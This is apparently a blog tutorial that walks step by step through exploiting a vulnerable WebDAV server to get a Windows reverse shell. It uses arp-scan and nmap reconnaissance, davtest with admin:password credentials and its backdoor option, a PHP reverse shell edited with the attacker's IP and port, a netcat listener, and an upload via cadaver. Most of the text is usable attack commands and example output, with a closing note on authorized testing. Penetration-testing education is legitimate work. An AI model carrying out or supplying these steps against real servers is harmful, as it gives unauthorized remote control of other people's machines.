In-Depth Steps for WebDAV Exploitation
WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers. In this guide, we'll explore the process of exploiting a target with a vulnerable WebDAV service to gain remote access using a PHP reverse shell. This tutorial assumes you have the necessary permissions to perform penetration testing on the target network.
Information Gathering
Step 0: Check Router IP from eth0 on your Kali Machine
ip addr
Example Results:
inet 192.168.1.10/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0
Step 1: Quick arp-scan
arp-scan 192.168.1.1/24
Example Results:
192.168.1.3 02:f9:8e:69:9e:55 (Unknown: locally administered)
192.168.1.1 e0:19:54:46:e5:6e zte corporation
192.168.1.11 08:00:27:e7:c3:e8 PCS Systemtechnik GmbH
Step 2: Nmap Scan for All Ports and OS Detection
nmap -Pn -T4 -vv -A -p1-65535 192.168.1.1/24 > /home/kali/Desktop/network-arp-scan.txt
Example Results:
Discovered open port 2869/tcp on 192.168.1.3
Discovered open port 7676/tcp on 192.168.1.11
Discovered open port 23/tcp on 192.168.1.1
// Also the open port 8585 for the WebDav
PORT STATE SERVICE REASON VERSION
8585/tcp open unknown syn-ack ttl 64
Nmap scan report for 192.168.1.11:
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
TCP/IP fingerprint:
Step 3: Davtest for WebDAV
davtest -auth admin:password -sendbd -auto -url http://192.168.1.11:8585/uploads
Example Results:
Testing DAV connection
OPEN SUCCEED: http://192.168.1.11:8585/uploads
WebDAV Exploitation
Step 4: Copy PHP Reverse Shell to Desktop
cp /usr/share/webshells/php/php-reverse-shell.php /home/kali/Desktop
Step 5: Edit PHP Reverse Shell
Edit /home/kali/Desktop/php-reverse-shell.php:
$ip = '192.168.1.10'; // Kali machine IP
$port = 7779; // TCP/UDP Port
$shell = 'cmd.exe'; // Use cmd.exe for Windows
Step 6: Start Netcat Listener on Kali
nc -lvnp 7779
Step 7: Upload PHP Reverse Shell Using Cadaver
cadaver http://192.168.1.11:8585/uploads
dav:/uploads/> put /home/kali/Desktop/php-reverse-shell.php
Step 8: Check Netcat Listener for Shell
nc -lnvp 7779
Now, you should have a reverse shell connection. Adapt the commands based on your specific scenario and environment.
Explanation:
-
Information Gathering:
- Step 0: Check the router IP to identify the local network's subnet.
- Step 1: Use arp-scan to discover active hosts on the network.
- Step 2: Perform an Nmap scan to find open ports and detect the operating system.
-
WebDAV Exploitation:
- Step 3: Use davtest to verify that the WebDAV service is accessible.
- Step 4: Copy a PHP reverse shell script to the attacker's machine.
- Step 5: Edit the PHP script with the attacker's IP and desired port.
- Step 6: Start a Netcat listener on Kali to receive the reverse shell connection.
- Step 7: Upload the modified PHP script to the target using Cadaver.
- Step 8: Check the Netcat listener for a successful reverse shell.
Remember to ensure ethical and legal use of penetration testing tools and techniques. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before performing penetration tests on any network.
Top comments (0)